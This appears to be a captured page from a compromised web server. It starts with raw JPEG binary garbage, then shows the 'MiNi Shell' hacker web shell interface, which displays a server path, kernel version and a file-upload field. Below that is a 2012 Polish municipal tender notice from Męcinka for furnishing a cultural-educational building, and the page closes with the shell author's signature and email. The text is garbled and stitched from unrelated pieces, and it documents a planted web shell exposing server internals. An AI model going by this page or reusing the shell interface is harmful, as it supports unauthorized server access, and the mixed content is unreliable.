JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121123/469390-N-2012.html

<p class="kh_header"><b>Męcinka: PRZEBUDOWA I WYPOSAŻENIE GMINNEGO OBIEKTU KULTURALNO-EDUKACYJNEGO W MĘCINCE Nr 85 - wyposażenie obiektu wraz z instalacją i rozmieszczeniem dostarczonych rzeczy</b><br>
<b>Numer ogłoszenia: 469390 - 2012; data zamieszczenia: 23.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Męcinka , Męcinka 11, 59-424 Męcinka, woj. dolnośląskie, tel. 076 8708623 w. 16, faks 076 8708624.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mecinka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA I WYPOSAŻENIE GMINNEGO OBIEKTU KULTURALNO-EDUKACYJNEGO W MĘCINCE Nr 85 - wyposażenie obiektu wraz z instalacją i rozmieszczeniem dostarczonych rzeczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zamówienia należy zrealizować dostawę wraz z instalacją i rozmieszczeniem  dostarczonych rzeczy . Zamawiający dopuszcza możliwość składania ofert częściowych. Zamówienie podzielono na następujące pakiety ( części).
CZĘŚĆ I - Nagłośnienie sali : kurtyna główna, kurtyna horyzontalna, kulisy, paldament sceniczny - 2 szt, reflektor 1000 W - 8 szt, światło efektowe - 4 szt, reflektor studio - - 8 szt., doświetlacz dichroniczny i mikser kolorów - 6 szt., redflektor na moście horyzontalnym - 8 szt., stopień mocy - 6 szt., sterownik oświetlenia - 1 szt., most oświetleniowy 6 mb nośność 299 kg - 2 szt., kolumny nagłośnienia frontowego 500 W - 4 szt., kolumny nagłośnienia frontowego boczne 2000 W - 2 szt., kolumny nagłośnienia efektowego 300 W - 4 szt., kolumny nagłośnienia odsłuchowe - 4 szt. , wzmacniacz szerokopasmowy - 1 szt, kolumny basowe - 2 szt., procesor głośnikowy - 1 szt., mikser główny - 1 szt., , mikser efektowy - 1 szt. , odtwarzacz MD-CD - 1 szt. , kompresor-limiter-bramka szumów - 1 szt. , mikrofony tradycyjne - 6 szt., mikrofony bezprzewodowe - 2 kpl podwójne, przewód MULTICORE - 30 mb, RACK sceniczny dla wzmacniaczy i urządzeń peryferyjnych - 1 szt. , ekran projekcyjny 4X3 m - 1 szt., projektor multimedialny 
- 1 szt.
CZĘŚĆ II : Zaciemnienie okien i obrusy:
1.	Zaciemnienie okien : rolety na prowadnicach w kasecie z powłoką całkowicie zaciemniającą - 9 szt. , rolety przyszybowe zaciemniające - 7 szt., zasłony ozdobne  o szerokości 240 cm i długości 265 cm pluszowe- 5 szt., lambrekiny pluszowe z systemem mocującym łukowym - 8 szt.,  karnisze stalowe jednorurkowe 140 cm - 5 szt. 
oraz :
2.	obrusy : obrusy na stoły okrągłe o śr. 180 cm. - 20 szt., obrusy o wym. 410 x 180 cm na stoły owalne - 20 szt.
CZĘŚĆ III : Balustrady , osłony i pochwyty : Balustrada metalowa ze stali nierdzewnej w demontowanych 4 segmentach długość balustrady 804 cm wysokość 110 cm. - 1 kpl., demontowane osłony / barierki do okien - wewnętrzne  szer. 137 x wys. 110, stal nierdzewna - 2,0 szt., osłony wewnętrzne do okien dużych - 3 szt. i do okien małych - 4 kpl., pochwyt przy schodach drewniany montowany do podłogi dł. 120 cm - 1szt, pochwyt przy schodach drewniany montowany do ściany dł. 120 cm - 1szt., pochwyt stalowy na schodach -  4mb.
CZĘŚĆ IV : Fotele i krzesła : Fotele drewniane z drewna bukowego z obiciem ze skóry ekologicznej z możliwością łączenia w sekcje po 15 szt.  - 124 szt., krzesła na stelażu drewnianym bukowym z obiciem ze skóry ekologicznej bez podłokietników- 21szt.
CZĘŚĆ V : Meble i sprzęt AGD : 
1. Meble i sprzęt AGD : szafa ubraniowa 100x60x190 - 2 szt., szafa ubraniowa 80x42x184 - 5 szt., krzesło obrotowe biurowe  - 1 szt., fotel tapicerowany skórą ekologiczną - 2 szt. , toaletka z lustrem  - 2 szt.  ,   narożnik 4 osobowy tapicerowany skórą ekologiczną,- 1  szt. , coffe table - 2 szt. , lada do szatni  - 1szt. , wieszaki metalowe do szatni na min. 130 miejsc, obrotowe na przegubie - 8 szt. , zabudowa kuchenna  : zabudowa zlewozmywaka, szafka wisząca nad zlewozmywakiem, szafka stojąca dolna, blat mocowany do ściany, zabudowa kuchenki elektrycznej, zlewozmywak jednokomorowy nierdzewna stal szlachetna - 1szt. , kuchenka elektryczna, płyta indukcyjna, pod zabudowę - 1 szt., sofa dwuosobowa - 2 szt.,  stół - 2 szt. , wieszak ścienny - 1 szt., biurko - 1 szt., kanapa dwuosobowa tapicerowana tkaniną - 2 szt., stół okrągły - 2 szt. , kanapa tapicerowana tkaniną, rozkładana jednoosobowa - 1 szt., 
2. Pozostałe meble i sprzęt AGD : stoły okrągłe z możliwością rozkładania  - 10    szt., regał biurowy - 1 szt. , wieszaki stojące  na kółkach - 4 szt. , ława - 2 szt., półka na buty  - 2 szt. , zmywarka gastronomiczna do naczyń z funkcją wyparzania - 1 szt.,  kuchenka mikrofalowa, min. 17 l, min. 1000 W - 1 szt., czajniki elektryczne  min. 2,3  l. grzałka płytowa - 4 szt. , okap - pochłaniacz 1 szt., wieszak na listwie ścienny o długości 4 m, 
CZĘŚĆ VI : Instalacje : instalacja klapy oddymiania - 1 kpl., hydrant wewnętrzny- 
 1 kpl
CZĘŚĆ VII : Wyposażenie pozostałe : dozownik mydła - 7  szt. , dozownik na ręczniki listkowe - 5szt. , szczotka do muszli - 8 szt., lustro wiszące - 6 szt., kosz uchylny  na odpady - 13 szt., Kosz siatkowy stojący 47 l - 4 szt., elektroniczny odświeżacz powietrza - 3 szt., Kołdra 160x200cm syntetyczna - 9 szt. , poduszka 60 x 60 cm . syntetyczna - 9 szt. , koc 160x200, akrylowy gładki, w kolorze jednolitym- 18,0 szt., bielizna pościelowa bawełniana 160x200 cm - 18,0 szt. i  80 x  100 cm - 18 szt. , prześcieradło 180x200 cm, bawełniane - 18,0 szt. , naczynia - zestaw na 150 osób, porcelana biała ( talerze płytkie duże i małe, głębokie, sztućce, wazy 20 szt., miski 40 szt., półmiski 40 szt. śr. 20 cm, dzbanki na napoje 2 l.- 30 szt., szklanki, sztućce: noże, widelce, łyżki duże, łyżeczki małe, widelczyki małe, filiżanki ze spodkami, szklanki do napojów/ literatki, bulionówki, lampki/, garnki kuchenne ze stali nierdzewnej, szlachetnej - 1 kpl., wazony szklane na kwiaty - 22 szt., sztuczne bukiety kwiatów :   - 22 kpl. , świeczniki stylowe stalowe 3 ramienne - 22 szt. z kompletem świec- 66 szt.  , serwetniki na stoły- 22 szt., wieszaki na ubrania - 50 szt., numerki na drzwi do pokoi: 1 i 2 - 1 kpl., napisy na drzwi : biuro, magazyn, pomieszczenie socjalne (2 szt.), szatnia,  garderoba 1, garderoba 2, toalety,  oznaczenie ozdobne pomieszczeń: wc damski - 3 szt., wc męski - 3 szt., numerki do szatni : 130 szt., ręczniki : 18 szt. o wym . 90 x 160 cm  i 4 szt. o wym. 30 x 50 cm, mata absorbcyjna, - 1 szt. , mata wejściowa - 2 szt.  , wycieraczka zewnętrzna - 1 szt.
Szczegółowy opis przedmiotu zamówienia  ujęto w CZĘŚĆ 1 - OPIS PRZEDMIOTU 
                   ZAMÓWIENIA ( w tym kolotystykę, rodzaj, jakość  materiałów)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 31.00.00.00-6, 38.65.21.00-1, 39.10.00.00-3, 39.51.31.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie 
       pisemnego aneksu, w następujących przypadkach i okolicznościach:
1.  przekształcenie którejkolwiek ze stron umowy,
2. zmiana osób reprezentujących strony oraz innych osób z nazwiska wymienionych w umowie,
3. zmiana wysokości stawki podatku od towarów i usług,
4. zaistnieją inne okoliczności niezależne od dostawcy , których nie można było przewidzieć w dniu 
    zawarcia umowy,
Warunkiem wprowadzenia zmian do zawartej umowy będzie wystąpienie jednej lub kilku z 
        przyczyn opisanych w SIWZ oraz protokół konieczności wraz z uzasadnieniem 
        podpisany przez Wykonawcę i Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.mecinka.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Męcinka
59-424 Męcinka 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2012 godzina 11:00, miejsce: sekretariat Urzędu Gminy Męcinka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie częściowo finansowane z Programu Rozwoju Obszarów Wiejskich na lata 
              2007-2013 Odnowa i rozwój wsi ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com